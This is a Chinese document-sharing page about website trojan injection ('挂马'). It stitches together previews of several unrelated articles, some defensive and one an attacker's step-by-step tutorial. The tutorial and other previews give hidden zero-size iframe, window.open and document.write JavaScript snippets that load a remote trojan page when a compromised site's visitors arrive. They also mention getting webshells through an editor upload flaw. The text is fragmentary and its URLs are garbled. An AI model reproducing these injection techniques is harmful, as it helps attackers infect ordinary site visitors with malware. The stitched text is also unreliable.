当前位置:文档之家 › 防4-4-使用iframe框架嵌入方式挂马

防4-4-使用iframe框架嵌入方式挂马

  • 格式:docx
  • 大小:864.56 KB
  • 文档页数:8

下载文档原格式

  / 8

合集下载

网站挂马

网站挂马

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下:1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。

网页挂马调查报告

网页挂马调查报告

网页挂马调查报告网页被挂马是最让站长头痛的一件事情,因为这说明已经有骇客拥有了你的网站的操作权限,面对这种情况,首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具,彻底清除恶意代码和后门;而如果你拥有自己的主机,则应当积极检查程序是否有漏洞并立即升级到最新的补丁。

所以作为站长就应当最早的发现网页被挂马的代码,下面是一些比较常见的挂马方式:常见挂马方式这种挂马方式比较多,主要是以下这种格式:“<iframe src=木马地址 width=0 height=0></iframe>”,width=0和height=0是为了隐藏框架。

与Iframe挂马平级,也比较常见,主要是以下这种格式:"<script src=木马地址></script>",当然也可以演变为Iframe挂马,"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。

附上一张石头博客被Script挂马的截图只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。

这种挂马方式与Script挂马差不多,惟一不同的就是使用了Encode隐藏了源JS的后缀,但同样可以达到执行代码的目的,主要是以下这种格式:“<script language='JScript.Encode' src=/a.txt></script>”虽然表面上看只是引用了一个txt文件,但是依然可以顺利执行其中的代码。

网页挂马详细步骤教程

网页挂马详细步骤教程

∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源:互联网作者:佚名时间:04-30 13:19:33【大中小】点评:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。

下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。

下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化看到左下角了吧,那里在请求,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了看下一种方法,把原来插进去的清理掉先,等下那个文件还要用方法二:这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了,我去掉先,还是给拦了晕,有个窗口弹了出来,这样子的网马是不保险的……不过也不失为一种方法呃~改成0就更大的窗口了,好,方法而已,只是介绍,下一个方法三:还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马,就写一个好了额刚才写错位置了保存为mm.js,然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码,从这里我们可以看到/mm.js,说明我们的mm.js 文件可以不传到主机上,这样可以方便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这里就不传了,就用本地的吧,运行左下角……调用了163的了,再刷新下,看清楚点,OK下一种方法方法五:再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件。

iframe 的用法

iframe 的用法

iframe 的用法(原创版)目录1.iframe 的定义与作用2.iframe 的基本属性3.iframe 的使用示例4.iframe 的注意事项正文一、iframe 的定义与作用iframe(Inline Frames)是一种内嵌式框架,可以将一个网页的部分内容嵌入到另一个网页中。

这种技术使得一个网页的某个区域可以显示另一个网页的内容,从而实现多个网页之间的无缝切换和交互。

二、iframe 的基本属性1.src:指定嵌入的网页的 URL。

2.width 和 height:分别设置 iframe 的宽度和高度。

3.frameborder:设置 iframe 边框的显示与否,取值为 0 或 1。

默认为 1。

4.scrolling:设置 iframe 是否显示滚动条,取值为 "yes"、"no" 或"auto"。

默认为 "auto"。

5.align:设置 iframe 在页面上的对齐方式,取值为 "left"、"right" 或 "top"。

默认为 "left"。

6.marginwidth 和 marginheight:分别设置 iframe 到父级框架的左边距和上边距。

7.framehash:设置是否允许网页生成 hash 值。

默认为 "no"。

三、iframe 的使用示例假设我们有一个主页(index.html)和一个子页(subpage.html),我们可以在主页中使用 iframe 嵌入子页的内容:```html<!-- index.html --><!DOCTYPE html><html><head><title>主页</title></head><body><h1>欢迎来到主页</h1><p>点击下方按钮查看子页内容:</p><button onclick="openIframe()">查看子页</button><iframe src="subpage.html" width="300" height="200" frameborder="0" scrolling="auto" align="left" marginwidth="0" marginheight="0"></iframe><script>function openIframe() {document.getElementById("iframe").src = "subpage.html";}</script></body></html>``````html<!-- subpage.html --><!DOCTYPE html><html><head><title>子页</title></head><body><h1>欢迎来到子页</h1></body></html>```四、iframe 的注意事项1.iframe 仅适用于 HTML 文档,不能在 XML 文档中使用。

网页挂马及其防御

网页挂马及其防御

网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上,“网页挂马”是一个出现频率很高的词汇。

关于某些网站被挂马导致大量浏览用户受到攻击,甚至造成财产损失的新闻屡见不鲜。

而这些挂马事件总能和一些软件漏洞联系起来。

那么,什么是网页挂马?网页挂马和软件漏洞有什么联系?它的危害在什么地方,又该如何防御呢?本文结合攻防研究中的经验体会,将就这些问题进行探讨。

网页挂马简介什么是网页挂马要解释什么是网页挂马,要先从木马说起。

大家知道,木马是一类恶意程序,和其它的正常文件一样存在于计算机系统中。

这些恶意程序一旦运行,会连接到远处的控制端,使其享有恶意程序所在系统的大部分操作权限,例如给计算机增删密码,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等各种有害操作,而这些操作往往不被使用者察觉。

将木马与网页结合起来成为网页木马,表面看似正常的网页,当浏览者浏览该网页的同时也运行了木马程序。

网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞,自动下载已经放置在远端的恶意程序。

由于下载过程利用了软件上的漏洞,是非正常途径,不会被计算机系统或浏览器本身所察觉。

网页挂马指的是攻击者篡改了正常的网页,向网页中插入一段代码,当用户浏览网页的同时执行这段代码,将引导用户去浏览放置好的网页木马。

使用一些特别的技术可以使得这段代码的执行对用户来说不可见。

网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞,只要这些漏洞能够被利用并执行任意代码,那么存在漏洞的系统就有可能受到网页木马攻击。

网页挂马的技术门槛并不高,互联网上可以得到很多现成的攻击工具。

同时网页木马隐蔽性高,挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行,用户都无法察觉。

网页挂马的传播范围同被挂马网页的数量和浏览量成正比。

各种类型的网站都可以成为网页挂马的对象。

上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。

解决网站被挂iframe木马的操作方案

解决网站被挂iframe木马的操作方案

解决网站被挂iframe木马的操作方案其实我们现在说的所谓的网站挂马一般就是在那些可编辑文件下加入一段iframe代码来实现访问指定的HTML网页木马的,然后通过你电脑本身的漏洞攻破你的系统给你下载一个下载者,然后那下载者设定多少时间后开始在指定地点隐藏下载木马并运行。

今天一上服务器2000多个<iframe src="http://XXXXX.xom/cn.htm" width=0 height=0></iframe> 被注入,我晕!检查了半天,原来是FckEditor编辑器上传漏洞导致。

在找资料的同时,发现CSS有一个有趣的属性expression,发现这个东东还有点意思,由此写出来,“以儆效尤”!引用:“IE5 及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。

就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。

在表达式中可以直接引用元素自身的属性和方法,也可以使用其他浏览器对象。

这个表达式就好像是在这个元素的一个成员函数中一样。

”我的理解是:expression 后面接js表达式执行相关操作格式:(1)标记固有的CSS属性名:expression(JS表达式);(2)自定义属性名:expression(JS表达式);使用JS销毁iframe对象原理:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe里的请求了。

CSS代码:iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');}解释:outerHTML属性是DOM对象包含自身的HTML代码,而innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。

挂马方法和技巧详解


(5) 在影音文件中挂马。
所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& /horse.htm (00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
3,如何才能挂到马
拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=/horse.js></script> ,horse里的js写法一般为 document.write(’http:\/\/\/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=/horse.htm/”></iframe>’’;。不过第2种写法要注意:是原来的网页种要有body标签。
3) 在 css中挂马。
这个方法就是在css中写入

网页挂马详细步骤教程

⽹页挂马详细步骤教程其实很简单的的,说到原理,就⼀个:就是在⼈家⽹站的主页那⾥插⼊⼀个⾃⼰的⽹马的页⾯,等有漏洞的⼈查看了⼈家⽹站的主页,那么他就成了你的⾁鸡了。

下⾯我介绍5种⽅法,我⼀个⼀个介绍⽅法⼀:这个就是最简单的了,只要你懂点html语⾔把下⾯这段代码插进⽹页中:<iframe src="这⾥换成你的⽹马的地址" width="0" height="0" frameborder="0"></iframe>我来插⼊,理论上来说插到任何地⽅都⾏,只是不要把html语⾔给弄乱了就⾏本来没有插进去的页⾯就是这样,不知道⽹易那⾥有没有弹出的⼴告了,好我们运⾏,注意到⽹页的左下⾓的⽹址变化看到左下⾓了吧,那⾥在请求,说明我们插⼊进去的页⾯也运⾏了,哦,还有个弹出的窗⼝,给我的⼯具拦了,我来刷新⼀次,看到吧width="0" height="0" frameborder="0"就是⼤⼩⾼度的意思,我们把他设置为零,那我们就不能看到⽹页的内容了看下⼀种⽅法,把原来插进去的清理掉先,等下那个⽂件还要⽤⽅法⼆:这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做⽹页的时候就会加⼊很多⽹页特效,同样我们也可以⽤来打开我们的⽹马,那么浏览过机⼦就会中我们的⽹马了~学过java的都知道上⾯⼀段代码的意思了把!打开⽹站的同时也就打开了我们的/test.htm看我们插进去弹出的窗⼝给拦了,我去掉先,还是给拦了晕,有个窗⼝弹了出来,这样⼦的⽹马是不保险的……不过也不失为⼀种⽅法呃~改成0就更⼤的窗⼝了,好,⽅法⽽已,只是介绍,下⼀个⽅法三:还有⼀点就是⽐较隐蔽的那就是使⽤js⽂件document.write("<iframe width='0' height='0' src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0' src='/mm2.htm'></iframe>");我们没必要挂两个⽹马,就写⼀个好了额刚才写错位置了保存为mm.js,然后在⾸页⾥调⽤js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调⽤的代码,从这⾥我们可以看到/mm.js,说明我们的mm.js⽂件可以不传到主机上,这样可以⽅便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这⾥就不传了,就⽤本地的吧,运⾏左下⾓……调⽤了163的了,再刷新下,看清楚点,OK下⼀种⽅法⽅法五:再⼀种代码就是调⽤其他⽹页的页⾯⽂件,可以将下⾯的代码复制,保存为HTM⽂件。

防范钓鱼网站与挂马网站


钓鱼网站传播途径
1、通过QQ、MSN、阿里旺旺等客户端聊天工具发送传播钓鱼网站链接; 2、在搜索引擎、中小网站投放广告,吸引用户点击钓鱼网站链接,此种 手段被假医药网站、假机票网站常用; 3、通过Email、论坛、博客、SNS网站批量发布钓鱼网站链接;
4、通过微博、Twitter中的短连接散布钓鱼网站链接;
• 1、系统和第三方软件补丁。 • 2、安装防挂马软件,例如RIS; • 3、增强系统口令强度,定期更换,8位以上数字字母符号 组合; • 4、不浏览不健康的网站; • 5、使用安全性相对高的浏览器。
瑞星如何防范钓鱼网站与挂马网站
瑞星如何防范钓鱼网站与挂马网站
瑞星安全播报
• 定期发布瑞星统计的安全信息
<script language=javascript src='tg.js'></script> 就是 调用了tg.js这个文件
几种简单的挂马方式
• CSS中挂马
CSS是Cascading Style Sheets的简称,一般称为“层叠样式表”, 实际上它是一组样式。 CSS的语句是内嵌在HTML文档内的,编写CSS的方法和编写 HTML文档的方法一样,只需要在引用CSS的页面部插入<link
马地址就可以了。
几种简单的挂马方式
• js文件挂马法
由于iframe所利用的代码很明显,由经验的管理员一搜
索就可以找到,所以有人想出了js文件挂马
document.write("<iframe src=
width=100 height=100></iframe>");
JS式挂马 56%
框架式挂马 27%

网站入侵挂马技术原理与防范


Hale Waihona Puke 2).判断分析网页漏洞 (1).攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似”ewebeditor.asp?id=”语句,只要类似的语句存在,就能判断网站确实使用了WEB编辑器。
(2).eWEBEditor编辑器可能被黑客利用的安全漏洞:
注:当用户打开/test.htm是,显示给用户的是,而/test.htm网页代码也随之运行
a.管理员未对数据库的路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。
b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆。或者是默认密码。直接进入编辑器的后台。
c.该WEB编辑器上传程序存在安全漏洞。
分析报告指出:网站的admin路径下发现cer.asp网页木马,经分析为老兵的网页木马。(加密后依旧能通过特征码分辨,推荐网站管理员使用雷客asp站长安全助手,经常效果如
(2).js脚本挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个。js文件,然后利用js代码调用到挂马的网页。通常代码如下:
/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了,如图3就是一个JS木马的代码。
2、获取Webshell
攻击者要进行网页挂马,必须要获取对站点文件的修改权限,而获取该站点Webshell是最普遍的做法。
其实可供攻击者实施的攻击手段比较多,比如注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞都可被利用。下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。